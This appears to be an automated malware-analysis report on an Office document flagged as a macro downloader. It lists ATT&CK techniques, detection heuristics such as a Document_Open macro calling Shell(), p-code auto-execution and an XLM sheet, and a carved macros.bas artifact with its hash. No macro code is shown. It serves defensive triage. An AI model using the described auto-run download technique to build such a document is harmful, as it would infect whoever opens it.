Verdict: MALICIOUS
Risk Score: 184

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains a Document_Open macro that uses the Shell() function, indicating an attempt to execute arbitrary code. This is further supported by the presence of VBA p-code auto-execution with execution tokens. The macro's obfuscation and the presence of a long encoded blob suggest it is designed to download and execute a second-stage payload, which is characteristic of downloader malware.
Heuristics (7)

- VBA macros detected (medium; OLE_VBA_MACROS; 3 related findings): Document contains VBA macro code.
- Shell() call in VBA (critical; OLE_VBA_SHELL): Shell() call in VBA.
- Document_Open macro (high; OLE_VBA_DOCOPEN): Document_Open macro.
- VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Excel 4.0 (XLM) macro sheet present (medium; OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream; XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
- Suspicious extracted artifact (info; EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59408 bytes |

SHA-256: e09dd843fbe2255fd3e9361c64e51a7baa89f8232333d4ea94738931ddfab321

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 5 long base64-like blob(s))

Preview script: first 1,000 lines of the extracted script (truncated)